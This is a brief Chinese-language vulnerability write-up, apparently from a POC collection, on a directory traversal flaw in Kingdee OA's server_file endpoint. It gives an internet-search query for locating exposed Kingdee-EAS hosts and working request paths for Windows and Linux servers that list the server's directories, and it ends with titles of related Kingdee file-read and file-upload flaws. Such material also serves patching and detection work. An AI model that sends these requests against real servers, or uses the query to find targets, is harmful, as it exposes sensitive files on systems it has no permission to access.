# 金蝶OA server_file 目录遍历漏洞

# 漏洞描述

金蝶OA server_file 存在目录遍历漏洞，攻击者通过目录遍历可以获取服务器敏感信息

# 漏洞影响

金蝶OA

# 网络测绘

app="Kingdee-EAS"

# 漏洞复现

登录界面为

漏洞POC

/appmonitor/protected/selector/server_file/files?folder=/&suffix=
Windows服务器

appmonitor/protected/selector/server_file/files?folder=C://&suffix=

Linux服务器
appmonitor/protected/selector/server_file/files?folder=/&suffix=

1
2
3
4
5
6
7

金蝶OA 云星空 CommonFileServer 任意文件读取漏洞金蝶OA 云星空 ScpSupRegHandler 任意文件上传漏洞